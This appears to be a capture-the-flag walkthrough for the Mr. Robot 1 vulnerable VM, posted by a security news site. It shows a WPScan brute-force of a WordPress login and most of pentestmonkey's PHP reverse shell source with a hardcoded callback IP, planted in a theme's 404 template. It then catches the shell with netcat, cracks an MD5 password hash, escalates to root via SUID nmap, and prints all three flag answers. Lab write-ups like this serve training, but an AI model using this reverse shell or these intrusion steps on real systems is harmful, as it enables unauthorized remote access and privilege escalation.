        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 3.6.3
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[+] URL: https://192.168.1.4/
 [+] Started: Sat Sep 28 02:07:13 2019
 Interesting Finding(s):
 [+] https://192.168.1.4/
  | Interesting Entries:
  |  - Server: Apache
  |  - X-Mod-Pagespeed: 1.9.32.3-4523
  | Found By: Headers (Passive Detection)
  | Confidence: 100%
 [+] https://192.168.1.4/robots.txt
  | Found By: Robots Txt (Aggressive Detection)
  | Confidence: 100%
 [+] https://192.168.1.4/xmlrpc.php
  | Found By: Direct Access (Aggressive Detection)
  | Confidence: 100%
  | References:
  |  - https://codex.wordpress.org/XML-RPC_Pingback_API
  |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
  |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
  |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
  |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
 [+] https://192.168.1.4/readme.html
  | Found By: Direct Access (Aggressive Detection)
  | Confidence: 100%
 [+] https://192.168.1.4/wp-cron.php
  | Found By: Direct Access (Aggressive Detection)
  | Confidence: 60%
  | References:
  |  - https://www.iplocation.net/defend-wordpress-from-ddos
  |  - https://github.com/wpscanteam/wpscan/issues/1299
 [+] WordPress version 4.3.20 identified (Latest, released on 2019-09-05).
  | Detected By: Rss Generator (Aggressive Detection)
  |  - https://192.168.1.4/feed/, https://wordpress.org/?v=4.3.20

  |  - https://192.168.1.4/comments/feed/, https://wordpress.org/?v=4.3.20
 [i] The main theme could not be detected.
 [+] Enumerating All Plugins (via Passive Methods)
 [i] No plugins Found.
 [+] Enumerating Config Backups (via Passive and Aggressive Methods)
  Checking Config Backups - Time: 00:00:00 <=============================================> (21 / 21) 100.00% Time: 00:00:00
 [i] No Config Backups Found.
 [+] Performing password attack on Xmlrpc Multicall against 1 user/s
 [SUCCESS] - Elliot / ER28-0652
 All Found
 Progress Time: 00:00:19 <==================================                              > (12 / 22) 54.54%  ETA: ??:??:??
 [i] Valid Combinations Found:
  | Username: Elliot, Password: ER28-0652
 [+] Finished: Sat Sep 28 02:07:35 2019
 [+] Requests Done: 63
 [+] Cached Requests: 5
 [+] Data Sent: 14.907 KB
 [+] Data Received: 1.282 MB
 [+] Memory used: 183.5 MB
 [+] Elapsed time: 00:00:21

• WPScan has find the password of login credentials. Now we will use this Login username – Elliot & Password – ER28-0652

• Above you can see that login page has opened.
• Now we have to find remaining 2 keys.
• For that we need remote shell of this login. For that we have to upload php file on hacked server using WordPress login password.
• For creating php file go to : https://pentestmonkey.net/tools/web-shells/php-reverse-shell

• Download the reverse shell code open terminal. Type wget https://pentestmonkey.net/tools/php-reverse-shell1.0.tar.gz
• You can also create your own PHP reserve shell, which is offered in exploit courses offered by International Institute of Cyber Security.

root@kali:/home/iicybersecurity/Downloads# wget https://pentestmonkey.net/tools/php-reverse-shell1.0.tar.gz
 --2019-09-30 02:01:28--  https://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.
 Resolving pentestmonkey.net (pentestmonkey.net)… 213.165.242.10, 2001:bd0:100:0:1::1
 Connecting to pentestmonkey.net (pentestmonkey.net)|213.165.242.10|:80… connected.
 HTTP request sent, awaiting response… 200 OK
 Length: 9018 (8.8K) [application/x-gzip]
 Saving to: ‘php-reverse-shell-1.0.tar.gz’
 php-reverse-shell-1.0.tar.gz 100%[=============================================>]   8.81K  --.-K
 2019-09-30 02:01:29 (14.9 MB/s) - ‘php-reverse-shell-1.0.tar.gz’ saved [9018/9018]

• Type tar -xvzf php-reverse-shell-1.0.tar.gz

root@kali:/home/iicybersecurity/Downloads# tar -xvzf php-reverse-shell-1.0.tar.gz
 php-reverse-shell-1.0/
 php-reverse-shell-1.0/COPYING.GPL
 php-reverse-shell-1.0/COPYING.PHP-REVERSE-SHELL
 php-reverse-shell-1.0/php-reverse-shell.php
 php-reverse-shell-1.0/CHANGELOG

• Type cd php-reverse-shell-1.0/ && ls

root@kali:/home/iicybersecurity/Downloads# cd php-reverse-shell-1.0/
root@kali:/home/iicybersecurity/Downloads/php-reverse-shell-1.0# ls
 CHANGELOG  COPYING.GPL  COPYING.PHP-REVERSE-SHELL  php-reverse-shell.php

• Upload php-reverse-shell.php to 404 Template. While Uploading change IP address & port no. Type 192.168.1.2 as our Kali Linux IP address & Port 4444
• Go to wordpress page & upload the php file go to Appearance < Editor & Go to Appearence < Editor < 404 Template
• Copy the php-reverse-shell<dot>php file.

<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  The author accepts no liability
// for damage caused by this tool.  If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.
//
// Usage
// -----
// See https://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.1.2';  // CHANGE THIS
$port = 4444;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
        // Fork and have the parent process exit
        $pid = pcntl_fork();

        if ($pid == -1) {
                printit("ERROR: Can't fork");
                exit(1);
        }

        if ($pid) {
                exit(0);  // Parent exits
        }
        // Make the current process a session leader
        // Will only succeed if we forked
        if (posix_setsid() == -1) {
                printit("Error: Can't setsid()");
                exit(1);
        }
        $daemon = 1;
} else {
        printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection


==================================================
=================== SNIPPED ======================
==================================================


        }
        // If we can read from the process's STDERR
        // send data down tcp connection
        if (in_array($pipes[2], $read_a)) {
                if ($debug) printit("STDERR READ");
                $input = fread($pipes[2], $chunk_size);
                if ($debug) printit("STDERR: $input");
                fwrite($sock, $input);
        }
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
        if (!$daemon) {
                print "$string\n";
        }
}
?>

• Open terminal Type nc -lvp 4444 on kali terminal
• Open web browser & type https://192.168.1.4/wpcontent/themes/twentyfifteen/404.php
• As you will type netcat command. You will get reverse shell of Mr. Robot VM.

root@kali:/home/iicybersecurity/Downloads/php-reverse-shell-1.0# nc -lvp 4444
 listening on [any] 4444 …
 192.168.1.4: inverse host lookup failed: Unknown host
 connect to [192.168.1.2] from (UNKNOWN) [192.168.1.4] 48232
 Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 G
  06:32:42 up  1:37,  0 users,  load average: 0.02, 0.07, 0.07
 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
 uid=1(daemon) gid=1(daemon) groups=1(daemon)
 /bin/sh: 0: can't access tty; job control turned off

• Type ls

 $ ls
 bin
 boot
 dev
 etc
 home
 initrd.img
 lib
 lib64
 lost+found
 media
 mnt
 opt
 proc
 root
 run
 sbin
 srv
 sys
 tmp
 usr
 var
 vmlinuz 

 $ pwd
 pwd
 /

• Type python -c ‘import pty; pty.spawn(“/bin/sh”)’ for getting access to robot directory.

$ python -c 'import pty; pty.spawn("/bin/sh")'
$ ls
 ls
 robot

• Now we have search further & we have found the 2nd key in robot directory type cd /robot && ls

$ pwd
  pwd
  /home/robot
$ ls
  ls
  key-2-of-3.txt  password.raw-md5
$ cat key-2-of-3.txt
  cat key-2-of-3.txt
  822c73956184f694993bede3eb39f959
$ cat password.raw-md5
  cat password.raw-md5
  robot:c3fcd3d76192e4007dfb496cca67e13b

• Above it shows that 2nd key is encrypted with raw.md5 hash. Go to crackstation.net. And type the 2nd key.
• Click on crack hashes.

• As you can see the Result shows alphabetic characters. abcdefghijklmnopqrstuvwxyz
• Type su – robot & enter the password.

$ su - robot
 su - robot
 Password: abcdefghijklmnopqrstuvwxyz

• Type find / -perm -u=s -type f 2>/dev/null to find the 3rd key.

$ find / -perm -u=s -type f 2>/dev/null
 find / -perm -u=s -type f 2>/dev/null
 /bin/ping
 /bin/umount
 /bin/mount
 /bin/ping6
 /bin/su
 /usr/bin/passwd
 /usr/bin/newgrp
 /usr/bin/chsh
 /usr/bin/chfn
 /usr/bin/gpasswd
 /usr/bin/sudo
 /usr/local/bin/nmap
 /usr/lib/openssh/ssh-keysign
 /usr/lib/eject/dmcrypt-get-device
 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
 /usr/lib/pt_chown

• Above command has shown many files but we are more interested in /usr/local/bin/nmap
• Type nmap –interactive && !sh. And you will see that we have got root privileges.

$ nmap --interactive
  nmap --interactive
  Starting nmap V. 3.81 ( https://www.insecure.org/nmap/ )
  Welcome to Interactive Mode -- press h  for help
  nmap> !sh
  !sh
  #

• Type cd /root && ls
• Type cat key-3-of-3.txt

 $ pwd
   pwd
   /root
 cd /root
 cd /root
 #
 ls
 firstboot_done  key-3-of-3.txt
 #
 cat key-3-of-3.txt
 04787ddef27c3dee1ee161b21670b4e4

• As you can see we have found the third key.
• We have found 3 Keys in 1st key was in https://192.168.1.4/robots.txt
• 2nd key was in robot directory
• 3rd key was in root directory.
• As per ethical hacking researcher of International Institute of Cyber Security, CTF challenges are good way to practice your hacking skills..

key-1-of-3.txt - 073403c8a58a1f80d943455fb30724b9 
key-2-of-3.txt - 822c73956184f694993bede3eb39f959
key-3-of-3.txt - 04787ddef27c3dee1ee161b21670b4e4

The post Mr. Robot 1 – Capture The Flag Challenge, walk through appeared first on Information Security Newspaper | Hacking News.